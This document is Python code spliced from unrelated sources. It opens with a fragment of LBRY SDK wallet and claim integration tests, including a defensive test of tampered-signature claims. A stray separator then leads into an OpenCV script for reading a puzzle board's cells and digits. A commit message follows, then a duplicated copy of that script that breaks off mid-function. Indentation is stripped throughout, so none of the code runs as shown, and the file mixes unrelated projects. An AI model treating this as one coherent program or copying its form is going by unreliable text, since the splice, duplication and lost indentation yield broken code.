# So he quickly decides to send a tip to him
tx = await self.out(
self.daemon.jsonrpc_claim_tip(claim3['claim_id'], '0.3', account_id=ramsey_account_id))
await self.confirm_tx(tx['txid'])
# And again checks if it went to the just right place
resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
# Which it obviously did. Because....?????
self.assertEqual(resolve_result[uri]['claim']['supports'][1]['amount'], '0.3')
self.assertEqual(resolve_result[uri]['claim']['supports'][1]['txid'], tx['txid'])
await self.generate(5)
# Seeing the ravishing success of his novel Chris adds support to his claim too
tx = await self.out(self.daemon.jsonrpc_claim_new_support('fresh-start', claim3['claim_id'], '0.4'))
await self.confirm_tx(tx['txid'])
# And check if his support showed up
resolve_result = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
# It did!
self.assertEqual(resolve_result[uri]['claim']['supports'][2]['amount'], '0.4')
self.assertEqual(resolve_result[uri]['claim']['supports'][2]['txid'], tx['txid'])
await self.generate(5)
# Now Ramsey who is a singer by profession, is preparing for his new "gig". He has everything in place for that
# the instruments, the theatre, the ads, everything, EXCEPT lyrics!! He panicked.. But then he remembered
# something, so he un-panicked. He quickly calls up his best bud Chris and requests him to write hit lyrics for
# his song, seeing as his novel had smashed all the records, he was the perfect candidate!
# .......
# Chris agrees.. 17 hours 43 minutes and 14 seconds later, he makes his publish
with tempfile.NamedTemporaryFile() as file:
file.write(b'The Whale amd The Bookmark')
file.write(b'I know right? Totally a hit song')
file.write(b'That\'s what goes around for songs these days anyways')
file.flush()
claim4 = await self.out(self.daemon.jsonrpc_publish(
'hit-song', '1.0', file_path=file.name, channel_id=channel['claim_id']
))
self.assertTrue(claim4['success'])
await self.confirm_tx(claim4['tx']['txid'])
await self.generate(5)
# He sends the link to Ramsey, all happy and proud
uri = 'lbry://@spam/hit-song'
# But sadly Ramsey wasn't so pleased. It was hard for him to tell Chris...
# Chris, though a bit heartbroken, abandoned the claim for now, but instantly started working on new hit lyrics
abandon = await self.out(self.daemon.jsonrpc_claim_abandon(txid=claim4['tx']['txid'], nout=0, blocking=False))
self.assertTrue(abandon['success'])
await self.confirm_tx(abandon['tx']['txid'])
# He them checks that the claim doesn't resolve anymore.
response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
self.assertNotIn('claim', response[uri])
class AccountManagement(CommandTestCase):
VERBOSE = False
async def test_performing_account_management_commands(self):
# check initial account
response = await self.daemon.jsonrpc_account_list()
self.assertEqual(len(response['lbc_regtest']), 1)
# change account name and gap
account_id = response['lbc_regtest'][0]['id']
self.daemon.jsonrpc_account_set(
account_id=account_id, new_name='test account',
receiving_gap=95, receiving_max_uses=96,
change_gap=97, change_max_uses=98
)
response = (await self.daemon.jsonrpc_account_list())['lbc_regtest'][0]
self.assertEqual(response['name'], 'test account')
self.assertEqual(
response['address_generator']['receiving'],
{'gap': 95, 'maximum_uses_per_address': 96}
)
self.assertEqual(
response['address_generator']['change'],
{'gap': 97, 'maximum_uses_per_address': 98}
)
# create another account
await self.daemon.jsonrpc_account_create('second account')
response = await self.daemon.jsonrpc_account_list()
self.assertEqual(len(response['lbc_regtest']), 2)
self.assertEqual(response['lbc_regtest'][1]['name'], 'second account')
account_id2 = response['lbc_regtest'][1]['id']
# make new account the default
self.daemon.jsonrpc_account_set(account_id=account_id2, default=True)
response = await self.daemon.jsonrpc_account_list(show_seed=True)
self.assertEqual(response['lbc_regtest'][0]['name'], 'second account')
account_seed = response['lbc_regtest'][1]['seed']
# remove account
self.daemon.jsonrpc_account_remove(response['lbc_regtest'][1]['id'])
response = await self.daemon.jsonrpc_account_list()
self.assertEqual(len(response['lbc_regtest']), 1)
# add account
await self.daemon.jsonrpc_account_add('recreated account', seed=account_seed)
response = await self.daemon.jsonrpc_account_list()
self.assertEqual(len(response['lbc_regtest']), 2)
self.assertEqual(response['lbc_regtest'][1]['name'], 'recreated account')
# list specific account
response = await self.daemon.jsonrpc_account_list(account_id, include_claims=True)
self.assertEqual(response['name'], 'recreated account')
class ClaimManagement(CommandTestCase):
VERBOSITY = logging.WARN
async def make_claim(self, name='hovercraft', amount='1.0', data=b'hi!', channel_name=None, confirm=True):
with tempfile.NamedTemporaryFile() as file:
file.write(data)
file.flush()
claim = await self.out(self.daemon.jsonrpc_publish(
name, amount, file_path=file.name, channel_name=channel_name
))
self.assertTrue(claim['success'])
if confirm:
await self.on_transaction_dict(claim['tx'])
await self.generate(1)
await self.on_transaction_dict(claim['tx'])
return claim
async def craft_claim(self, name, amount_dewies, claim_dict, address):
# FIXME: this is here mostly because publish has defensive code for situations that happens accidentally
# However, it still happens... So, let's reproduce them.
claim = ClaimDict.load_dict(claim_dict)
address = address or (await self.account.receiving.get_addresses(limit=1, only_usable=True))[0]
tx = await Transaction.claim(name, claim, amount_dewies, address, [self.account], self.account)
await self.broadcast(tx)
await self.ledger.wait(tx)
await self.generate(1)
await self.ledger.wait(tx)
return tx
async def test_create_update_and_abandon_claim(self):
self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
claim = await self.make_claim(amount='2.5') # creates new claim
txs = await self.out(self.daemon.jsonrpc_transaction_list())
self.assertEqual(len(txs[0]['claim_info']), 1)
self.assertEqual(txs[0]['confirmations'], 1)
self.assertEqual(txs[0]['claim_info'][0]['balance_delta'], '-2.5')
self.assertEqual(txs[0]['claim_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs[0]['value'], '0.0')
self.assertEqual(txs[0]['fee'], '-0.020107')
self.assertEqual('7.479893', await self.daemon.jsonrpc_account_balance())
await self.make_claim(amount='1.0') # updates previous claim
txs = await self.out(self.daemon.jsonrpc_transaction_list())
self.assertEqual(len(txs[0]['update_info']), 1)
self.assertEqual(txs[0]['update_info'][0]['balance_delta'], '1.5')
self.assertEqual(txs[0]['update_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs[0]['value'], '0.0')
self.assertEqual(txs[0]['fee'], '-0.0001955')
self.assertEqual('8.9796975', await self.daemon.jsonrpc_account_balance())
await self.out(self.daemon.jsonrpc_claim_abandon(claim['claim_id']))
txs = await self.out(self.daemon.jsonrpc_transaction_list())
self.assertEqual(len(txs[0]['abandon_info']), 1)
self.assertEqual(txs[0]['abandon_info'][0]['balance_delta'], '1.0')
self.assertEqual(txs[0]['abandon_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs[0]['value'], '0.0')
self.assertEqual(txs[0]['fee'], '-0.000107')
self.assertEqual('9.9795905', await self.daemon.jsonrpc_account_balance())
async def test_update_claim_holding_address(self):
other_account_id = (await self.daemon.jsonrpc_account_create('second account'))['id']
other_account = self.daemon.get_account_or_error(other_account_id)
other_address = await other_account.receiving.get_or_create_usable_address()
self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
# create the initial name claim
claim = await self.make_claim()
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine()), 1)
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine(account_id=other_account_id)), 0)
tx = await self.daemon.jsonrpc_claim_send_to_address(
claim['claim_id'], other_address
)
await self.ledger.wait(tx)
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine()), 0)
self.assertEqual(len(await self.daemon.jsonrpc_claim_list_mine(account_id=other_account_id)), 1)
async def test_publishing_checks_all_accounts_for_certificate(self):
account1_id, account1 = self.account.id, self.account
new_account = await self.daemon.jsonrpc_account_create('second account')
account2_id, account2 = new_account['id'], self.daemon.get_account_or_error(new_account['id'])
spam_channel = await self.out(self.daemon.jsonrpc_channel_new('@spam', '1.0'))
self.assertTrue(spam_channel['success'])
await self.confirm_tx(spam_channel['tx']['txid'])
self.assertEqual('8.989893', await self.daemon.jsonrpc_account_balance())
result = await self.out(self.daemon.jsonrpc_wallet_send(
'5.0', await self.daemon.jsonrpc_address_unused(account2_id)
))
await self.confirm_tx(result['txid'])
self.assertEqual('3.989769', await self.daemon.jsonrpc_account_balance())
self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))
baz_channel = await self.out(self.daemon.jsonrpc_channel_new('@baz', '1.0', account2_id))
self.assertTrue(baz_channel['success'])
await self.confirm_tx(baz_channel['tx']['txid'])
channels = await self.out(self.daemon.jsonrpc_channel_list(account1_id))
self.assertEqual(len(channels), 1)
self.assertEqual(channels[0]['name'], '@spam')
self.assertEqual(channels, await self.out(self.daemon.jsonrpc_channel_list()))
channels = await self.out(self.daemon.jsonrpc_channel_list(account2_id))
self.assertEqual(len(channels), 1)
self.assertEqual(channels[0]['name'], '@baz')
# defaults to using all accounts to lookup channel
with tempfile.NamedTemporaryFile() as file:
file.write(b'hi!')
file.flush()
claim1 = await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '1.0', file_path=file.name, channel_name='@baz'
))
self.assertTrue(claim1['success'])
await self.confirm_tx(claim1['tx']['txid'])
# uses only the specific accounts which contains the channel
with tempfile.NamedTemporaryFile() as file:
file.write(b'hi!')
file.flush()
claim1 = await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '1.0', file_path=file.name,
channel_name='@baz', channel_account_id=[account2_id]
))
self.assertTrue(claim1['success'])
await self.confirm_tx(claim1['tx']['txid'])
# fails when specifying account which does not contain channel
with tempfile.NamedTemporaryFile() as file:
file.write(b'hi!')
file.flush()
with self.assertRaisesRegex(ValueError, "Couldn't find channel with name '@baz'."):
await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '1.0', file_path=file.name,
channel_name='@baz', channel_account_id=[account1_id]
))
async def test_updating_claim_includes_claim_value_in_balance_check(self):
self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
await self.make_claim(amount='9.0')
self.assertEqual('0.979893', await self.daemon.jsonrpc_account_balance())
# update the same claim
await self.make_claim(amount='9.0')
self.assertEqual('0.9796235', await self.daemon.jsonrpc_account_balance())
# update the claim a second time but use even more funds
await self.make_claim(amount='9.97')
self.assertEqual('0.009354', await self.daemon.jsonrpc_account_balance())
# fails when specifying more than available
with tempfile.NamedTemporaryFile() as file:
file.write(b'hi!')
file.flush()
with self.assertRaisesRegex(
InsufficientFundsError,
"Please lower the bid value, the maximum amount"
" you can specify for this claim is 9.97928."
):
await self.out(self.daemon.jsonrpc_publish(
'hovercraft', '9.98', file_path=file.name
))
async def test_abandoning_claim_at_loss(self):
self.assertEqual('10.0', await self.daemon.jsonrpc_account_balance())
claim = await self.make_claim(amount='0.0001')
self.assertEqual('9.979793', await self.daemon.jsonrpc_account_balance())
await self.out(self.daemon.jsonrpc_claim_abandon(claim['claim_id']))
self.assertEqual('9.97968399', await self.daemon.jsonrpc_account_balance())
async def test_abandoned_channel_with_signed_claims(self):
channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "1.0"))
self.assertTrue(channel['success'])
await self.confirm_tx(channel['tx']['txid'])
claim = await self.make_claim(amount='0.0001', name='on-channel-claim', channel_name='@abc')
self.assertTrue(claim['success'])
abandon = await self.out(self.daemon.jsonrpc_claim_abandon(txid=channel['tx']['txid'], nout=0, blocking=False))
self.assertTrue(abandon['success'])
channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "1.0"))
self.assertTrue(channel['success'])
await self.confirm_tx(channel['tx']['txid'])
# Original channel doesnt exists anymore, so the signature is invalid. For invalid signatures, resolution is
# only possible outside a channel
response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://@abc/on-channel-claim'))
self.assertNotIn('claim', response['lbry://@abc/on-channel-claim'])
response = await self.out(self.daemon.jsonrpc_resolve(uri='lbry://on-channel-claim'))
self.assertIn('claim', response['lbry://on-channel-claim'])
self.assertFalse(response['lbry://on-channel-claim']['claim']['signature_is_valid'])
direct_uri = 'lbry://on-channel-claim#' + claim['claim_id']
response = await self.out(self.daemon.jsonrpc_resolve(uri=direct_uri))
self.assertIn('claim', response[direct_uri])
self.assertFalse(response[direct_uri]['claim']['signature_is_valid'])
uri = 'lbry://@abc/on-channel-claim'
# now, claim something on this channel (it will update the invalid claim, but we save and forcefully restore)
original_claim = await self.make_claim(amount='0.00000001', name='on-channel-claim', channel_name='@abc')
self.assertTrue(original_claim['success'])
# resolves normally
response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
self.assertIn('claim', response[uri])
self.assertTrue(response[uri]['claim']['signature_is_valid'])
# tamper it, invalidating the signature
value = response[uri]['claim']['value'].copy()
value['stream']['metadata']['author'] = 'some troll'
address = response[uri]['claim']['address']
await self.craft_claim('on-channel-claim', 1, value, address)
# it resolves to the now only valid claim under the channel, ignoring the fake one
response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
self.assertIn('claim', response[uri])
self.assertTrue(response[uri]['claim']['signature_is_valid'])
# ooops! claimed a valid conflict! (this happens on the wild, mostly by accident or race condition)
await self.craft_claim('on-channel-claim', 1, response[uri]['claim']['value'], address)
# it still resolves! but to the older claim
response = await self.out(self.daemon.jsonrpc_resolve(uri=uri))
self.assertIn('claim', response[uri])
self.assertTrue(response[uri]['claim']['signature_is_valid'])
self.assertEqual(response[uri]['claim']['txid'], original_claim['tx']['txid'])
async def test_claim_list_by_channel(self):
self.maxDiff = None
tx = await self.daemon.jsonrpc_account_fund(None, None, '0.001', outputs=100, broadcast=True)
await self.ledger.wait(tx)
await self.generate(1)
await self.ledger.wait(tx)
channel = await self.out(self.daemon.jsonrpc_channel_new('@abc', "0.0001"))
self.assertTrue(channel['success'])
await self.confirm_tx(channel['tx']['txid'])
# 4 claims per block, 3 blocks. Sorted by height (descending) then claim_id (ascending).
claims = []
for j in range(3):
same_height_claims = []
for k in range(3):
claim = await self.make_claim(amount='0.000001', name=f'c{j}-{k}', channel_name='@abc', confirm=False)
self.assertTrue(claim['success'])
same_height_claims.append(claim['claim_id'])
await self.on_transaction_dict(claim['tx'])
claim = await self.make_claim(amount='0.000001', name=f'c{j}-4', channel_name='@abc', confirm=True)
self.assertTrue(claim['success'])
same_height_claims.append(claim['claim_id'])
same_height_claims.sort(key=lambda x: int(x, 16))
claims = same_height_claims + claims
page = await self.out(self.daemon.jsonrpc_claim_list_by_channel(1, page_size=20, uri='@abc'))
page_claim_ids = [item['claim_id'] for item in page['@abc']['claims_in_channel']]
self.assertEqual(page_claim_ids, claims)
page = await self.out(self.daemon.jsonrpc_claim_list_by_channel(1, page_size=6, uri='@abc'))
page_claim_ids = [item['claim_id'] for item in page['@abc']['claims_in_channel']]
self.assertEqual(page_claim_ids, claims[:6])
out_of_bounds = await self.out(self.daemon.jsonrpc_claim_list_by_channel(2, page_size=20, uri='@abc'))
self.assertEqual(out_of_bounds['error'], 'claim 20 greater than max 12')
async def test_regular_supports_and_tip_supports(self):
# account2 will be used to send tips and supports to account1
account2_id = (await self.daemon.jsonrpc_account_create('second account'))['id']
# send account2 5 LBC out of the 10 LBC in account1
result = await self.out(self.daemon.jsonrpc_wallet_send(
'5.0', await self.daemon.jsonrpc_address_unused(account2_id)
))
await self.confirm_tx(result['txid'])
# account1 and account2 balances:
self.assertEqual('4.999876', await self.daemon.jsonrpc_account_balance())
self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))
# create the claim we'll be tipping and supporting
claim = await self.make_claim()
# account1 and account2 balances:
self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
self.assertEqual('5.0', await self.daemon.jsonrpc_account_balance(account2_id))
# send a tip to the claim using account2
tip = await self.out(
self.daemon.jsonrpc_claim_tip(claim['claim_id'], '1.0', account2_id)
)
await self.on_transaction_dict(tip)
await self.generate(1)
await self.on_transaction_dict(tip)
# tips don't affect balance so account1 balance is same but account2 balance went down
self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
self.assertEqual('3.9998585', await self.daemon.jsonrpc_account_balance(account2_id))
# verify that the incoming tip is marked correctly as is_tip=True in account1
txs = await self.out(self.daemon.jsonrpc_transaction_list())
self.assertEqual(len(txs[0]['support_info']), 1)
self.assertEqual(txs[0]['support_info'][0]['balance_delta'], '1.0')
self.assertEqual(txs[0]['support_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs[0]['support_info'][0]['is_tip'], True)
self.assertEqual(txs[0]['value'], '1.0')
self.assertEqual(txs[0]['fee'], '0.0')
# verify that the outgoing tip is marked correctly as is_tip=True in account2
txs2 = await self.out(
self.daemon.jsonrpc_transaction_list(account2_id)
)
self.assertEqual(len(txs2[0]['support_info']), 1)
self.assertEqual(txs2[0]['support_info'][0]['balance_delta'], '-1.0')
self.assertEqual(txs2[0]['support_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs2[0]['support_info'][0]['is_tip'], True)
self.assertEqual(txs2[0]['value'], '-1.0')
self.assertEqual(txs2[0]['fee'], '-0.0001415')
# send a support to the claim using account2
support = await self.out(
self.daemon.jsonrpc_claim_new_support('hovercraft', claim['claim_id'], '2.0', account2_id)
)
await self.on_transaction_dict(support)
await self.generate(1)
await self.on_transaction_dict(support)
# account2 balance went down ~2
self.assertEqual('3.979769', await self.daemon.jsonrpc_account_balance())
self.assertEqual('1.999717', await self.daemon.jsonrpc_account_balance(account2_id))
# verify that the outgoing support is marked correctly as is_tip=False in account2
txs2 = await self.out(self.daemon.jsonrpc_transaction_list(account2_id))
self.assertEqual(len(txs2[0]['support_info']), 1)
self.assertEqual(txs2[0]['support_info'][0]['balance_delta'], '-2.0')
self.assertEqual(txs2[0]['support_info'][0]['claim_id'], claim['claim_id'])
self.assertEqual(txs2[0]['support_info'][0]['is_tip'], False)
self.assertEqual(txs2[0]['value'], '0.0')
self.assertEqual(txs2[0]['fee'], '-0.0001415')
class TransactionCommandsTestCase(CommandTestCase):
async def test_transaction_show(self):
# local tx
result = await self.out(self.daemon.jsonrpc_wallet_send(
'5.0', await self.daemon.jsonrpc_address_unused(self.account.id)
))
await self.confirm_tx(result['txid'])
tx = await self.daemon.jsonrpc_transaction_show(result['txid'])
self.assertEqual(tx.id, result['txid'])
# someone's tx
change_address = await self.blockchain.get_raw_change_address()
sendtxid = await self.blockchain.send_to_address(change_address, 10)
tx = await self.daemon.jsonrpc_transaction_show(sendtxid)
self.assertEqual(tx.id, sendtxid)
self.assertEqual(tx.height, -2)
await self.generate(1)
tx = await self.daemon.jsonrpc_transaction_show(sendtxid)
self.assertEqual(tx.height, self.ledger.headers.height)
# inexistent
result = await self.daemon.jsonrpc_transaction_show('0'*64)
self.assertFalse(result['success'])
async def test_utxo_release(self):
sendtxid = await self.blockchain.send_to_address(
await self.account.receiving.get_or_create_usable_address(), 1
)
await self.confirm_tx(sendtxid)
await self.assertBalance(self.account, '11.0')
await self.ledger.reserve_outputs(await self.account.get_utxos())
await self.assertBalance(self.account, '0.0')
await self.daemon.jsonrpc_utxo_release()
await self.assertBalance(self.account, '11.0')
|
#!/usr/bin/env python3.7
"""
This program is assumed to be executed in the directory where it lives in,
so all file paths are relative to that.
"""
import cv2
import functools
import math
import numpy as np
from matplotlib import pyplot
import collections
import os
tm_method = cv2.TM_CCOEFF_NORMED
def load_sample(size):
return cv2.imread(f'../private/sample-{size}x{size}.png')
def find_and_mark_matches(img, result, pat_dims, threshold):
"""Find and mark matching places given a result of matchTemplate.
"""
img_marked = img.copy()
h, w = result.shape
pat_h, pat_w = pat_dims
for r in range(h):
for c in range(w):
if (result[r,c] > threshold):
print(r,c, result[r,c])
top_left = (c,r)
bottom_right = (c + pat_w, r + pat_h)
cv2.rectangle(img_marked, top_left, bottom_right, 255, 2)
return img_marked
def scale_pattern(pat_orig, target_width):
pat_orig_h, pat_orig_w = pat_orig.shape[0], pat_orig.shape[1]
scale = target_width / pat_orig_w
pat_h = round(pat_orig_h * scale)
pat_w = round(pat_orig_w * scale)
return cv2.resize(pat_orig, (pat_w, pat_h), cv2.INTER_AREA)
def optimize_pattern_width(pat_orig, img):
eval_count = 0
@functools.lru_cache()
def evaluate_width(width):
nonlocal eval_count
pat = scale_pattern(pat_orig, width)
pat_w, pat_h, _ = pat.shape
result = cv2.matchTemplate(img,pat,tm_method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
eval_count += 1
return max_val
# search within this range, with decreasing steps per iteration until
# we reach a local maxima
min_width, max_width = 30, 220
step = 16
candidates = set(range(min_width, max_width, step))
while True:
sorted_candidates = sorted(candidates,key=evaluate_width,reverse=True)
# Only top few candidates survive.
keep = max(1, math.floor(len(sorted_candidates) * 0.1))
candidates = sorted_candidates[:keep]
step //= 2
if not step:
break
# candidate expansion for next iteration.
candidates = {
y
for x in candidates
for y in [x-step, x, x+step]
if min_width <= y <= max_width
}
# note that here candidates are sorted
best_target_width = candidates[0]
print(f'Best target width is: {best_target_width}, evaluations: {eval_count}')
return best_target_width
def resample_pattern_from_image(pat_orig, img):
best_target_width = optimize_pattern_width(pat_orig, img)
pat = scale_pattern(pat_orig, best_target_width)
pat_h, pat_w, _ = pat.shape
result = cv2.matchTemplate(img,pat,tm_method)
_, _, _, max_loc = cv2.minMaxLoc(result)
c, r = max_loc
return img[r:r+pat_h,c:c+pat_w]
def subplot_gray(num, img, title):
pyplot.subplot(num), pyplot.imshow(img,cmap = 'gray')
pyplot.title(title), pyplot.xticks([]), pyplot.yticks([])
def subplot_color(num, img, title):
pyplot.subplot(num), pyplot.imshow(img[:,:,[2,1,0]])
pyplot.title(title), pyplot.xticks([]), pyplot.yticks([])
def main_all_samples():
pat_orig = cv2.imread('../sample/tree-sample.png')
for i in range(5,22+1):
img = load_sample(i)
target_width = optimize_pattern_width(pat_orig, img)
print(f'{i}: {target_width}')
def resolve_stat(d, size, threshold = 3):
"""
Given a dict d and an expected # of elements,
derive a list of row values (or column values) from it.
"""
hold = None # or (k, <sub dict>)
grouping = []
for k, v in sorted(d.items(), key=lambda x: x[0]):
if hold is None:
hold = (k, {k: v})
else:
kh, sd = hold
if k - kh < threshold:
sd[k] = v
else:
grouping.append(sd)
hold = (k, {k: v})
if hold is not None:
grouping.append(hold[1])
hold = None
# TODO: given sufficient info we might be able to
# "fill in the blank" if there are missing elements,
# but for now it seems good enough to not worry about
# this issue.
assert len(grouping) == size
# calculate weighted average from grouping elements.
def ave(sub_dict):
numer = sum(k * v for k, v in sub_dict.items())
denom = sum(sub_dict.values())
return numer / denom
return map(ave, grouping)
def rescale_and_match(img, templ_in, tm_method):
(_,_,w,h) = cv2.boundingRect(img)
if w == 0 or h == 0:
return None
else:
# try to rescale pattern to match image width (of the bounding rect)
# we are targeting width here because we can prevent one digit pattern
# to match with multiple digit ones this way.
# also because digits tend to vary more in horizontal direction
# so we are actually eliminating lots of candidates this way.
templ_in_h, templ_in_w = templ_in.shape
scale = w / templ_in_w
templ_h = round(templ_in_h * w / templ_in_w)
if templ_h > h:
return None
templ = cv2.resize(templ_in, (w, templ_h), cv2.INTER_AREA)
result = cv2.matchTemplate(img, templ, tm_method)
_, max_val, _, _ = cv2.minMaxLoc(result)
return max_val
def find_cell_bounds(img, size):
h, w, _ = img.shape
# This is the exact color that game uses for blank cells.
bk = (49, 49, 52)
result = cv2.inRange(img, bk, bk)
mk_stat = lambda: collections.defaultdict(lambda: 0)
row_begins_stat = mk_stat()
row_ends_stat = mk_stat()
col_begins_stat = mk_stat()
col_ends_stat = mk_stat()
mask = np.zeros((h+2,w+2), dtype=np.uint8)
# skip first region encountered, which is likely just the difficulty box
# on the top right corner.
first_skipped = False
for r in range(h):
for c in range(w):
if (result[r,c] != 0):
x,y = c,r
retval, result, _, rect = cv2.floodFill(result, mask, (x,y), 0)
rect_x, rect_y, rect_w, rect_h = rect
if not first_skipped:
first_skipped = True
continue
row_begins_stat[rect_y] += 1
col_begins_stat[rect_x] += 1
rect_x_end = rect_x + rect_w - 1
rect_y_end = rect_y + rect_h - 1
row_ends_stat[rect_y_end] += 1
col_ends_stat[rect_x_end] += 1
def make_bounds(begin_stat, end_stat):
begin_coords = map(round, resolve_stat(begin_stat, size))
end_coords = map(round, resolve_stat(end_stat, size))
return list(map(lambda x,y: (x,y), begin_coords, end_coords))
row_bounds = make_bounds(row_begins_stat, row_ends_stat)
col_bounds = make_bounds(col_begins_stat, col_ends_stat)
return row_bounds, col_bounds
def main_experiment():
size = 22
img = load_sample(size)
h, w, _ = img.shape
row_bounds, col_bounds = find_cell_bounds(img, size)
cells = [ [ None for _ in range(size) ] for _ in range(size)]
for r, (row_lo, row_hi) in enumerate(row_bounds):
for c, (col_lo, col_hi) in enumerate(col_bounds):
cells[r][c] = img[row_lo:row_hi+1, col_lo:col_hi+1]
def find_tree(cell_img):
color_shade = (0x55, 0xc8, 0x87)
result = cv2.inRange(cell_img, color_shade, color_shade)
(_,_,w,h) = cv2.boundingRect(result)
if w != 0 and h != 0:
color = 0xFF
else:
color = 0
return np.full((4,4), color)
recombined = np.concatenate([ np.concatenate(row, axis=1) for row in cells], axis=0)
cell_results_recombined = np.concatenate([
np.concatenate([ find_tree(c) for c in row], axis=1) for row in cells
], axis=0)
max_cell_side = max(map(lambda x: x[1] - x[0] + 1, row_bounds + col_bounds))
def extract_digit(row,col):
return img[row:row+max_cell_side-1,col:col+max_cell_side-1]
# Suppose first two cells are A and B, we can then find a cell C if we extend
# difference between A and B but in the other direction.
# A - (B - A) = 2A - B
digit_row_start = 2 * row_bounds[0][0] - row_bounds[1][0]
digit_col_start = 2 * col_bounds[0][0] - col_bounds[1][0]
color_unsat = (0x41, 0x4e, 0x7e) # B,G,R
color_sat = (0x97, 0xa7, 0xc8)
side_length_for_display = math.ceil(max_cell_side * 1.1)
def process_digit_cell(dg_img):
result = cv2.inRange(dg_img, color_unsat, color_unsat)
(x,y,w,h) = cv2.boundingRect(result)
if w == 0 or h == 0:
return None
return result[y:y+h,x:x+w]
def padding_digit_img(dg_img):
if dg_img is None:
return np.full((side_length_for_display, side_length_for_display), 0x7F)
h, w = dg_img.shape
top = math.floor((side_length_for_display - h) / 2)
bottom = side_length_for_display - top - h
left = math.floor((side_length_for_display - w) / 2)
right = side_length_for_display - left - w
return cv2.copyMakeBorder(dg_img, top, bottom, left, right, borderType=cv2.BORDER_CONSTANT, value=0x7F)
# TODO: make a matrix of matching results of matchTemplate for row / col digits.
# where the template is digits cropped by bounding rect,
# and image is the digit picture after inRange filter.
# TODO: scaling is for now ignored but we'll do something about it
# plan: run boundingRect on digit image, and use height of resulting
# rectangle to scale the template into same height before matchTemplate run.
# digits accompanying every column.
col_digits = [
extract_digit(digit_row_start,col_lo)
for col_lo, _ in col_bounds
]
col_digit_templs = [ process_digit_cell(d) for d in col_digits ]
# same but for rows
row_digits = [
extract_digit(row_lo,digit_col_start)
for row_lo, _ in row_bounds
]
row_digit_templs = [ process_digit_cell(d) for d in row_digits ]
def debug_cross_compare(digits, digit_templs):
for dg_img_pre in digits:
dg_img = cv2.inRange(dg_img_pre, color_unsat, color_unsat)
line = []
for templ in digit_templs:
if templ is None:
line.append('------')
continue
max_val = rescale_and_match(dg_img,templ,tm_method)
if max_val is None:
line.append('------')
continue
line.append(f'{max_val:.4f}')
print(', '.join(line))
print('Mat for row digits:')
debug_cross_compare(row_digits, row_digit_templs)
print('Mat for col digits:')
debug_cross_compare(col_digits, col_digit_templs)
digits = np.concatenate(
[
np.concatenate([padding_digit_img(x) for x in row_digit_templs], axis=1),
np.concatenate([padding_digit_img(x) for x in col_digit_templs], axis=1),
])
# digit sample extraction steps (for each single cell image)
# (TODO: for simplicity, let's only consider color of unsat digits for now)
# - cv2.inRange to extract shape of the digit
# - cv2.boundingRect to find the bounding rectangle
# - crop it and save it as image.
# - for sat digits, the checkmark needs to be extracted,
# but that's not an immediate issue as most of the digits are indeed unsat.
# - note that a digit cell can contain multiple digits,
# we could get only a partial digit, but that doesn't really affect
# the correctness of matchTemplate.
show = True
if show:
pyplot.figure().canvas.set_window_title('@dev')
subplot_color(221, img, 'origin')
subplot_color(222, recombined, 'extracted')
subplot_gray(223, digits, 'digits')
subplot_gray(224, cell_results_recombined, 'find tree')
pyplot.show()
def main_tagging():
# TODO:
# the idea of this function is to turn this program into an iterative loop to
# gradually tag sample images with digits, recognized from board of various sizes.
store_path = '../private/digits'
if not os.path.exists(store_path):
os.makedirs(store_path)
# limit the # of samples stored to disk per execution.
store_quota = 12
for size in range(6,22+1):
if store_quota <= 0:
break
img = load_sample(size)
h, w, _ = img.shape
if __name__ == '__main__':
main_experiment()
# main_tagging()
move more stuff to top level.
#!/usr/bin/env python3.7
"""
This program is assumed to be executed in the directory where it lives in,
so all file paths are relative to that.
"""
import cv2
import functools
import math
import numpy as np
from matplotlib import pyplot
import collections
import os
tm_method = cv2.TM_CCOEFF_NORMED
color_unsat = (0x41, 0x4e, 0x7e) # B,G,R
color_sat = (0x97, 0xa7, 0xc8)
color_shade = (0x55, 0xc8, 0x87)
def load_sample(size):
return cv2.imread(f'../private/sample-{size}x{size}.png')
def find_and_mark_matches(img, result, pat_dims, threshold):
"""Find and mark matching places given a result of matchTemplate.
"""
img_marked = img.copy()
h, w = result.shape
pat_h, pat_w = pat_dims
for r in range(h):
for c in range(w):
if (result[r,c] > threshold):
print(r,c, result[r,c])
top_left = (c,r)
bottom_right = (c + pat_w, r + pat_h)
cv2.rectangle(img_marked, top_left, bottom_right, 255, 2)
return img_marked
def scale_pattern(pat_orig, target_width):
pat_orig_h, pat_orig_w = pat_orig.shape[0], pat_orig.shape[1]
scale = target_width / pat_orig_w
pat_h = round(pat_orig_h * scale)
pat_w = round(pat_orig_w * scale)
return cv2.resize(pat_orig, (pat_w, pat_h), cv2.INTER_AREA)
def optimize_pattern_width(pat_orig, img):
eval_count = 0
@functools.lru_cache()
def evaluate_width(width):
nonlocal eval_count
pat = scale_pattern(pat_orig, width)
pat_w, pat_h, _ = pat.shape
result = cv2.matchTemplate(img,pat,tm_method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
eval_count += 1
return max_val
# search within this range, with decreasing steps per iteration until
# we reach a local maxima
min_width, max_width = 30, 220
step = 16
